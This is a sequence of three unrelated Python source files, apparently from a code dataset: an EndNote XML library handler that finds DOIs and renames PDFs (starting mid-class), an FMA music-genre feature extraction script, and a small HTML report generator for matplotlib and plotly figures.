if (self.records[i].find('pdf-urls') is None):
self.addtag(i,'pdf-urls','',parent='urls')
self.checktag(i,'dates')
self.setdoi(i,self.getdoi(i))
#def __repr__(self):
# return self.soup.encode()
def __str__(self):
return self.soup.encode()
def reset(self,fname):
self.__init__(fname)
def read(self,fname):
self.__init__(fname)
def reads(self,s):
self.content=s
self.soup=BeautifulSoup(self.content,'html.parser')
self.records=self.soup.records.contents
self.length=len(self.records)
for i in range(self.length):
self.checktag(i,'titles')
self.checktag(i,'authors')
self.checktag(i,'urls')
if (self.records[i].find('related-urls') is None):
self.addtag(i,'related-urls','',parent='urls')
if (self.records[i].find('pdf-urls') is None):
self.addtag(i,'pdf-urls','',parent='urls')
self.checktag(i,'dates')
self.setdoi(i,self.getdoi(i))
def writes(self,encoding='utf-8'):
return self.soup.encode(encoding=encoding)
def write(self,fname,encoding='utf-8'):
f=open(fname,'w')
f.write(self.writes(encoding=encoding))
f.close()
def getrecord(self,num):
if (num>=self.length):
return None
return self.records[num]
def checktag(self,num,tag):
if self.records[num].find(tag) is None:
self.addtag(num,tag,value='')
def addtag(self,num,tag,value=None,parent=None):
'''value can be string, tag'''
a=self.soup.new_tag(tag)
if value: a.string=value
if parent:
self.records[num].find(parent).append(a)
else:
self.records[num].append(a)
def gettag(self,num,tag,parent=None,obj=False):
if parent:
if self.records[num].find(parent):
if self.records[num].find(parent).find(tag):
if (obj):
return self.records[num].find(parent).find(tag)
else:
return self.records[num].find(parent).find(tag).string
else:
return ''
else:
return ''
else:
if self.records[num].find(tag):
if (obj):
return self.records[num].find(tag)
else:
return self.records[num].find(tag).string
else:
return ''
def settag(self,num,tag,value,parent=None):
if parent:
if self.records[num].find(parent):
if self.records[num].find(parent).find(tag):
self.records[num].find(parent).find(tag).string=value
else:
self.addtag(num,tag,parent=parent,value=value)
else:
a=self.soup.new_tag(tag)
a.string=value
self.addtag(num,parent,parent=None,value=a)
else:
if self.records[num].find(tag):
self.records[num].find(tag).string=value
else:
self.addtag(num,tag,parent=None,value=value)
def getpath(self):
db=self.soup.findChild("database")
if (db):
return os.path.splitext(db['path'])[0]+'.Data'
else:
return ""
def getdoi(self,num):
doistr=self.gettag(num,"electronic-resource-num")
if (doistr):
doiindex=doistr.find('10.')
else:
doiindex=-1
if (doiindex >=0):
return doistr[doiindex:].lower().strip()
else:
return ""
def setdoi(self,num,value):
self.settag(num,"electronic-resource-num",value)
def gettitle(self,num):
return self.gettag(num,"title")
def settitle(self,num,value):
self.settag(num,"title",value)
def getjournalfull(self,num):
return self.gettag(num,'secondary-title')
def getyear(self,num):
return self.gettag(num,'year','dates')
def setyear(self,num,value):
self.settag(num,'year',value,'dates')
def getvolume(self,num):
return self.gettag(num,'volume')
def setvolume(self,num,value):
self.settag(num,'volume',value)
def getissue(self,num):
return self.gettag(num,'number')
def setissue(self,num,value):
self.settag(num,'number',value)
def getpages(self,num):
return self.gettag(num,'pages')
def setpages(self,num,value):
self.settag(num,'pages',value)
def getnotes(self,num):
return self.gettag(num,'notes')
def setnotes(self,num,value):
self.settag(num,'notes',value)
def geturl(self,num):
urls=self.gettag(num,'related-urls',obj=True)
if (urls):
return [ i.string for i in urls.find_all('url') ]
else:
return []
def seturl(self,num,value):
'''Note that it will clean all the url!'''
if (self.soup.find('related-urls') is not None):
urls=self.gettag(num,'related-urls',obj=True)
if (urls):
urls.clear()
else:
self.addtag(num,'related-urls',parent='urls')
self.addtag(num,'url',value,'related-urls')
def addurl(self,num,value,first=False):
urls=self.gettag(num,'related-urls',obj=True)
a=self.soup.new_tag('url')
a.string=value
if (urls):
if (not first):
urls.append(a)
else:
urls.insert(0,a)
else:
self.settag(num,'related-urls',a,'urls')
def getpdf(self,num):
urls=self.gettag(num,'pdf-urls',obj=True)
if (urls):
return [ i.string for i in urls.find_all('url') ]
else:
return []
def setpdf(self,num,value):
'''Note that it will clean all the url!'''
if (self.soup.find('pdf-urls') is not None):
urls=self.gettag(num,'pdf-urls',obj=True)
if (urls):
urls.clear()
else:
self.addtag(num,'pdf-urls',parent='urls')
self.addtag(num,'url',value,'pdf-urls')
def setpdfs(self,num,value):
'''Note that it will clean all the url!'''
if (self.soup.find('pdf-urls') is not None):
urls=self.gettag(num,'pdf-urls',obj=True)
if (urls):
urls.clear()
else:
self.addtag(num,'pdf-urls',parent='urls')
for url in value:
self.addtag(num,'url',url,'pdf-urls')
def addpdf(self,num,value,first=False):
urls=self.gettag(num,'pdf-urls',obj=True)
a=self.soup.new_tag('url')
a.string=value
if (urls):
if (not first):
urls.append(a)
else:
urls.insert(0,a)
else:
self.addtag(num,'pdf-urls',a,'urls')
def finddoi(self,num,prefix='',issn=''):
title=self.gettitle(num)
doi=DOI(self.getdoi(num))
if (not prefix):
prefix = doi.split('/',1)[0] if doi else ""
volume= self.getvolume(num)
journal=self.getjournalfull(num)
year=self.getyear(num)
pages=self.getpages(num)
self.cr=CRrecord()
try:
# The origin doi maybe true. Find in crossref
if ( doi and self.cr.getfromdoi(doi,fullparse=False) and self.cr.doi):
# Further check title
if (strdiff(doi,self.cr.doi)>=0.85 and \
strsimilarity(normalizeString(title),normalizeString(self.cr.title))>0.75):
return doi
if( volume and pages ):
ops=pages.split('-')
crps=self.cr.pages.split('-')
if (len(ops)>0 and len(crps)>0 and ops[0]==crps[0] and volume==self.cr.volume):
return doi
if( year and pages ):
ops=pages.split('-')
crps=self.cr.pages.split('-')
if (len(ops)>0 and len(crps)>0 and ops[0]==crps[0] and year==self.cr.year):
return doi
print "Origin DOI:",doi,"may be true but record strange..Try title"
keyword=title+" "+journal+" "+year+" "+pages+" "+volume
if (self.cr.getfromtitledoi(keyword,doi,year=year,limit=10,fullparse=False,prefix=prefix)):
if (doi):
if( prefix == self.cr.doi.split('/')[0] and strdiff(doi,self.cr.doi)>=0.85):
return self.cr.doi
else:
print "Error for origin doi: "+doi+"; found: "+self.cr.doi
return ""
return self.cr.doi
if (doi):
if( strdiff(doi,self.cr.doi)>=0.85):
return self.cr.doi
else:
print "Error2 for origin doi: "+doi+"; found: "+self.cr.doi
return ""
else:
return ""
except Exception as e:
print "Error when find doi..",e,"\nRetry..."
return self.finddoi(num,prefix=prefix,issn=issn)
def preprocess(self):
pass
def cleannote(self,num):
note=self.getnotes(num)
notel=note.lower()
if ("time" in notel):
self.setnotes(num,notel[notel.find('time'):])
def cleanallpdf(self,exceptOAPDF=True):
'''Clean PDF record or except OAPDF record'''
for i in range(self.length):
if (not exceptOAPDF):
self.setpdf(i,'')
else:
for pdf in self.getpdf(i):
if "internal-pdf://OAPDF/" in pdf:
self.setpdf(i,pdf)
break
def process(self,fname="",cleannote=False,prefix='',issn='',start=0):
epath=self.getpath()
print "Output",self.length,"to",epath+os.sep+fname
for i in range(start,self.length):
try:
#if (i%100 is 0):
# print
# print "Doing:",i+1,
#else:
# print i+1,
pdfs=self.getpdf(i)
urls=self.geturl(i)
# Fast consider as record process before
hasfound=False
for pdf in pdfs:
if "internal-pdf://OAPDF/" in pdf:
hasfound=True
doistr=self.gettag(i,"electronic-resource-num")
if (doistr and len(doistr)>4 and doistr[:4]=='chk:'):
doi=DOI(self.getdoi(i))
if doi:
self.setdoi(i,"chk: "+doi)
break
if not hasfound:
for url in urls:
if "http://oapdf.sourceforge.net/cgi-bin/" in url:
hasfound=True
doistr=self.gettag(i,"electronic-resource-num")
if (doistr and len(doistr)>4 and doistr[:4]=='chk:'):
doi=DOI(self.getdoi(i))
if doi:
self.setdoi(i,"chk: "+doi)
break
if hasfound:
continue
if (cleannote):
self.cleannote(i)
doistr=self.gettag(i,"electronic-resource-num")
if (doistr and len(doistr)>4 and doistr[:4]=='chk:'):
doi=DOI(self.getdoi(i))
else:
doi=DOI(self.finddoi(i,prefix=prefix,issn=issn))
if doi:
self.setdoi(i,"chk: "+doi)
oapdflink=""
if (doi and doi.is_oapdf()):
oapdflink="http://oapdf.sourceforge.net/cgi-bin/doipage.cgi?doi="+doi
newpdfs=[]
for pdf in pdfs:
pdfpath=pdf.replace("internal-pdf://",epath+os.sep+"PDF"+os.sep)
relpath=pdf.replace("internal-pdf://","")
# should never happen
if (relpath == doi.quote()+".pdf"):
newpdfs.append(pdf)
continue
if (doi):
if (os.path.exists(pdfpath)):
try:
os.renames(pdfpath,epath+os.sep+"PDF"+os.sep+doi.quote()+".pdf")
newpdfs.append("internal-pdf://"+doi.quote()+".pdf")
except:
print "Can't rename:",pdf,'to',doi.quote()+".pdf"
newpdfs.append(pdf)
continue
else:
print "Maybe error for the record",doi,"with pdf path:",pdf,'; Try finding..',
pdfdir=os.path.split(pdfpath)[0]
if (os.path.exists(pdfdir)):
fs=glob.glob(pdfdir+os.sep+'*.pdf')
if (len(fs)==1):
try:
os.renames(fs[0],epath+os.sep+"PDF"+os.sep+doi.quote()+".pdf")
newpdfs.append("internal-pdf://"+doi.quote()+".pdf")
print "Find",fs[0],'and rename!'
except:
print "Can't rename:",fs[0],'to',doi.quote()+".pdf"
newpdfs.append(pdf)
continue
else:
print "Can't find.."
newpdfs.append(pdf)
continue
else:
newpdfs.append(pdf)
continue
else:
print "Blank doi for file:",pdf
newpdfs.append(pdf)
continue
if (oapdflink):
newpdfs.append("internal-pdf://OAPDF/"+doi.quote()+".pdf")
self.setpdfs(i,newpdfs)
# Set the urls
if (oapdflink and oapdflink not in urls):
self.addurl(i,oapdflink,first=True)
except Exception as e:
print "Error at ", i, 'since: ',e
#return 1
if fname:
self.write(fname)
return 0 |
<filename>feature_extraction_deep_learning/custom_module/extract_cqt_mel_spect_fma.py
import numpy
from audioread import NoBackendError
import pandas
import sys
MODULE_PATH = '/home/macbookretina/automatic-music-genre-classification/feature_extraction_deep_learning'
sys.path.insert(1, MODULE_PATH)
from custom_module.utilities import *
# def process_and_save(cqts, mel_spects, genre_labels, count):
# # check if all the lists are equal in length and throw an exception if not
# path = '/home/macbookretina/s3-bucket/data'
# count = str(count)
# print('checking if the lists are equal in size.')
# is_all_equal_in_length = len(cqts) == len(mel_spects) == len(genre_labels)
# assert (is_all_equal_in_length), \
# 'cqts: ' + str(len(cqts)) + \
# ' mel_spects: ' + str(len(mel_spects)) + \
# ' genre_labels: ' + str(len(genre_labels))
# # convert the lists to arrays so it can be stacked
# print('converting lists to numpy array')
# cqts = numpy.array(cqts)
# mel_spects = numpy.array(mel_spects)
# length = len(cqts)
# genre_labels = numpy.array(genre_labels).reshape(length, 1)
# data_sources = numpy.array(['fma']*length).reshape(length, 1)
# data_cqts = {
# 'genre_labels': genre_labels,
# 'data_sources': data_sources,
# 'cqts': cqts
# }
# data_mel = {
# 'genre_labels': genre_labels,
# 'data_sources': data_sources,
# 'cqts': cqts
# }
# # create dataframes and save as csvs
# print('stacking array & saving as csv')
# # cqt_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, cqts)))
# # mel_spect_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, mel_spects)))
# cqt_df = pandas.DataFrame(data_cqts)
# mel_spect_df = pandas.DataFrame(data_mel)
# cqt_df.to_csv(path + '/cqt_fma_' + count + '.csv')
# mel_spect_df.to_csv(path + '/mel_spect_fma_' + count + '.csv')
# print('saved batch: ' + count + '!!')
# return [], [], []
def extract_from_fma():
# extract log-mel / constant-Q transform and mel-spectomgram in fma
# collect track id and genres of tracks in the small subset.
print('collecting track id and genres of tracks in the small subset of fma dataset')
tracks = load(MOUNTED_DATASET_PATH + '/fma_metadata/tracks.csv')
fma_full = tracks[[('set', 'subset'), ('track', 'genre_top')]]
small_subset = fma_full[('set', 'subset')] == 'small'
fma_small = fma_full[small_subset]
fma_small = pd.DataFrame({
'subset': fma_small[('set', 'subset')],
'label': fma_small[('track', 'genre_top')]
})
print('collected track id and genres of tracks in the small subset of fma')
# create an empty list to store extract feature and label
cqts = []
mel_spects = []
genre_labels = []
data_sources = []
print('extracting log-mel and mel-spectogram from fma dataset')
count = 0
for directory in os.scandir(MOUNTED_DATASET_PATH + '/fma_small'):
if directory.is_dir():
for file in os.scandir(directory.path):
# if count == 1:
# cqts, mel_spects, genre_labels = process_and_save(
# cqts, mel_spects, genre_labels, count)
if file.is_file():
# extract track id and map track id to genre label
track_id = int(file.name[:-4].lstrip('0'))
genre_label = fma_small.at[track_id, 'label'].lower().replace('-', '')
if genre_label in GENRES:
try:
scaled_cqt = extract_cqt(file);
scaled_mel_spect = extract_mel_spect(file);
except RuntimeError:
print('RuntimeError')
continue
except NoBackendError:
print('NoBackendError')
continue
# adjust shape to the shape with most occurence
if scaled_cqt.shape[1] != 2812:
scaled_cqt.resize(84, 2812, refcheck=False)
if scaled_mel_spect.shape[1] != 2812:
scaled_mel_spect.resize(128, 2812, refcheck=False)
# append to list
genre_labels.append(genre_label)
# flatten to fit into dataframe and add to the list
scaled_cqt = scaled_cqt.flatten()
cqts.append(scaled_cqt)
scaled_mel_spect = scaled_mel_spect.flatten()
mel_spects.append(scaled_mel_spect)
feedback(file, genre_label)
count = count + 1
# check if all the lists are equal in length and throw an exception if not
print('checking if the lists are equal in size.')
is_all_equal_in_length = len(cqts) == len(mel_spects) == len(genre_labels)
assert (is_all_equal_in_length), \
'cqts: ' + str(len(cqts)) + \
' mel_spects: ' + str(len(mel_spects)) + \
' genre_labels: ' + str(len(genre_labels))
# convert the lists to arrays so it can be stacked
print('converting lists to numpy array')
cqts = numpy.array(cqts)
mel_spects = numpy.array(mel_spects)
length = len(cqts)
genre_labels = numpy.array(genre_labels).reshape(length, 1)
data_sources = numpy.array(['fma']*length).reshape(length, 1)
# # create dataframes and save as csvs
# print('stacking array & saving as csv')
# cqt_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, cqts)))
# mel_spect_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, mel_spects)))
# cqt_df.to_csv(path + '/cqt_fma.csv')
# mel_spect_df.to_csv(path + '/mel_spect_fma.csv')
# print('done')
if __name__ == '__main__':
extract_from_fma() |
<gh_stars>1-10
import re
import os
import mpld3
import base64
import plotly
import matplotlib
from io import BytesIO
from mpld3._server import serve
from matplotlib import pyplot as plt
import pandas as pd
current_path = os.path.dirname(__file__)
resources_path = os.path.abspath(
os.path.join(
current_path,
'resources',
)
)
favicon_path = os.path.join(
resources_path,
'logo_2.ico',
)
class Reportity():
def __init__(
self,
title,
include_plotly_js=False,
):
self.include_plotlyjs = include_plotly_js
self.fist_figure = True
self.html = ''
self.figures_next_id = 0
self.figures_href = ''
self.html_ended = False
self.html = '''
<!DOCTYPE html>
<html lang="en">
<head>
<style>
body {{
margin:20px;
padding:20px;
}}
div {{
margin: 25px;
}}
.center {{
display: block;
margin-left: auto;
margin-right: auto;
width: 50%;
}}
.plotly-graph-div {{
display: block;
margin-left: auto;
margin-right: auto;
width: auto;
hight: auto;
}}
hr {{
display: block;
margin-top: 0.5em;
margin-bottom: 0.5em;
margin-left: auto;
margin-right: auto;
border-style: inset;
border-width: 1px;
}}
</style>
<title>{title}</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel='icon' href={favicon_path} type='image/ico'/ >
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
<script src="https://cdn.plot.ly/plotly-latest.min.js"></script>
</head>
<body>
'''.format(
title=title,
favicon_path=favicon_path,
)
self.html += '<h1 align="center", style="font-size:400%">{title}</h1><hr>figures_hrefs'.format(
title=title,
)
def __end_html__(
self,
):
if self.html_ended:
return
self.html_ended = True
self.html += '''
</body>
</html>
'''
self.figures_href = '<h1 >Figures List</h1>' + self.figures_href
self.html = re.sub(
pattern='figures_hrefs',
repl=self.figures_href,
string=self.html,
)
def print_header(
self,
text,
level,
):
self.html += '<h{level}>{text}</h{level}>'.format(
level=level,
text=text,
)
def print_paragraph(
self,
text,
):
self.html += '<div><p>{text}</p></div>'.format(
text=text,
)
def print_dataframe(
self,
dataframe,
max_rows=100,
):
html_table = '<div class="container">'
html_table += dataframe.to_html(
max_rows=max_rows,
)
html_table += '</div>'
html_table = re.sub(
pattern=r'<table.+>',
repl='<table class="table table-hover table-striped">',
string=html_table,
)
self.html += html_table
def print_figure(
self,
figure,
figure_name=None,
as_image=False,
):
fig_html, figure_name =self._get_fig_html(
figure=figure,
figure_name=figure_name,
as_image=as_image,
)
figure_id = self._get_next_id()
figure_name_html = '<div><p id="{figure_id}">{figure_name}</p></div>'.format(
figure_id=figure_id,
figure_name=figure_name,
)
self.figures_href += '<a href="#{figure_id}">{figure_name}</a><br>'.format(
figure_id=figure_id,
figure_name=figure_name,
)
self.html += figure_name_html
self.html += fig_html
def print_2_figures(
self,
figure_left,
figure_right,
figure_name=None,
as_image=False,
):
fig_html_left, figure_name_left =self._get_fig_html(
figure=figure_left,
figure_name=figure_name,
as_image=as_image,
)
fig_html_right, figure_name_right =self._get_fig_html(
figure=figure_right,
figure_name=figure_name,
as_image=as_image,
)
figure_id = self._get_next_id()
figure_name_html = '<div><p id="{figure_id}">{figure_name}</p></div>'.format(
figure_id=figure_id,
figure_name=figure_name,
)
self.figures_href += '<a href="#{figure_id}">{figure_name}</a><br>'.format(
figure_id=figure_id,
figure_name=figure_name,
)
fig_html = '''
<div style="height: 90%; width:95%; float: center; display:flex;">
<div style="flex: 1; margin-right: 5px;">
{fig_left}
</div>
<div style="flex: 1; margin-right: 5px;">
{fig_right}
</div>
</div>
<br>
'''.format(
fig_left=fig_html_left,
fig_right=fig_html_right,
)
self.html += figure_name_html
self.html += fig_html
def show(
self,
):
self.__end_html__()
serve(self.html)
def save_as_html(
self,
path,
):
self.__end_html__()
with open(
file=path,
mode='w',
) as f:
f.write(self.html)
def save_as_pdf(
self,
path,
):
self.__end_html__()
raise NotImplementedError
def _get_fig_html(
self,
figure,
figure_name,
as_image,
):
if type(figure) == matplotlib.figure.Figure:
fig_html, figure_name = self._convert_matplotlib_figure(
figure=figure,
as_image=as_image,
figure_name=figure_name,
)
if type(figure) == plotly.graph_objs._figure.Figure:
fig_html, figure_name = self._convert_plotly_figure(
figure=figure,
figure_name=figure_name,
)
return fig_html, figure_name
def _convert_matplotlib_figure(
self,
figure,
figure_name,
as_image,
):
if not figure_name:
try:
figure_name = figure.axes[0].get_title()
except:
figure_name = 'figure'
if as_image:
fig_html = self._get_figure_image_html(
figure=figure,
)
else:
try:
fig_html = mpld3.fig_to_html(figure).split('<div ')
fig_html = fig_html[0] + '<div align="center" ' + fig_html[1]
except:
fig_html = self._get_figure_image_html(
figure=figure,
)
return fig_html, figure_name
def _get_figure_image_html(
self,
figure,
):
buf = BytesIO()
figure.savefig(
buf,
format='png',
)
data = base64.b64encode(buf.getbuffer()).decode('ascii')
fig_html = '<img src=\'data:image/png;base64,{data}\' class="center" />'.format(
data=data,
)
return fig_html
def _convert_plotly_figure(
self,
figure,
figure_name,
):
if not figure_name:
try:
figure_name = figure['layout']['title']['text']
except KeyError:
figure_name = 'figure'
if figure['layout']['width']:
figure['layout']['width'] = None
if self.fist_figure == True:
include_plotlyjs = self.include_plotlyjs
self.fist_figure = False
else:
include_plotlyjs = False
fig_html = plotly.offline.plot(
figure, include_plotlyjs=include_plotlyjs,
output_type='div',
)
return fig_html, figure_name
def _get_next_id(
self,
):
self.figures_next_id += 1
return self.figures_next_id
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.